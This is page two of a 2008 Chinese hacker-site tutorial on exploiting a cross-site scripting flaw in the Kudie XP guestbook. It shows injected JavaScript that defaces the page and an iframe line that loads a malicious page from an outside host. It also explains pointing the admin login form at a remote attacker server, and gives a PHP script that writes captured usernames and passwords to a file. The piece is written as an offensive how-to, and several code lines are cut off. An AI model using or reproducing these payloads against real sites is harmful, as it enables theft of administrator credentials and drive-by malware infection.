跨出精彩---- 酷蝶XP留言簿跨站利用 - 黑客之家|黑客动画|黑客教程|网站入侵|木马免杀|脱壳破解|远程控制|灰鸽子|无后门软件下载|黑软下载|免费下载

您当前的位置：黑客之家 → 文章中心 → 脚本入侵 → 文章内容

退出登录

用户管理

本类热门文章

·跨出精彩---- 酷蝶XP留言簿跨站利用

站内广告

跨出精彩---- 酷蝶XP留言簿跨站利用

作者：黑客之家来源：www.hackjia.com 发布时间：2008-1-22 2:40:55

减小字体增大字体

bsp;info = "樱花浪子到些一游！"
    document.write(info);
    }
    function doit(){
    setTimeout("Phish()", 1000 );
    }doit()
大家看看返回了什么，直接就可以改页面了，如图6所示。

点击在新窗口中浏览此图片

450) {this.resized=true; this.width=450;}" border=0 resized="true">

　如果想挂马就更容易了，JS内容改为：document.write("<iframe style='display:none;' src='http://xxx.com/xx.htm'... 就可以了。
那能不能在高级点呢，其实我们还可以把页面变成一个自己操纵的登录页面，将表单的值指向远程服务器上的程序，这个很久以前剑心就提到过了，
是个ASP的程序，不过和PHP都是一样的，在地址栏提交：javascript:alert(document.forms.length)，会弹出当前页面几个表单，如图7所示。
javascript:alert(document.forms[0].action)，查看第一个表单的属性，指向/test/index.php?actioin=add，图8所示。

点击在新窗口中浏览此图片

450) {this.resized=true; this.width=450;}" border=0 resized="true">

点击在新窗口中浏览此图片

450) {this.resized=true; this.width=450;}" border=0 resized="true">

　只要我们改了表单的action属性就会钓到管理员帐号和密码，只要在JS里改成document.forms[下标].action="http://hacklu.net/test/pas...，
pass.php内容如下：
<?php
Header("Location: http://127.0.0.1:81/test/i...
if(isset($_POST['$admin_name'])&&isset($_POST['$admin_pass'])){

$file_path="password.txt";
$file = @fopen($file_path,"a");

$string = "Username:".$_POST['a_name']."and password:".$_POST['a_pass']."\n";

@fwrite($file,$string);
@fclose($file);

}
?>
　

　我们在用javascript:alert(document.forms[0].action)来看看，已经指向远程服务器文件了，如图9。

点击在新窗口中浏览此图片

450) {this.resized=true; this.width=450;}" border=0 resized="true">

这样只要管理员登录就会直接钓到登陆的帐号。过程只在一瞬间
就完成了。其实这也不是什么新技术，我只是站在前人思路写一下。最后大家找我可以来非安全。

上一页 [1] [2]

[] [返回上一页] [打印]

上一篇文章：红色黑客联盟的一次检测
下一篇文章：卫士通获计算机信息防护解决方案优秀奖

关于本站 - 网站帮助 - 广告合作 - 下载声明 - 友情连接 - 网站地图 - 文章投稿 - 软件发布 - 购物资讯网 - _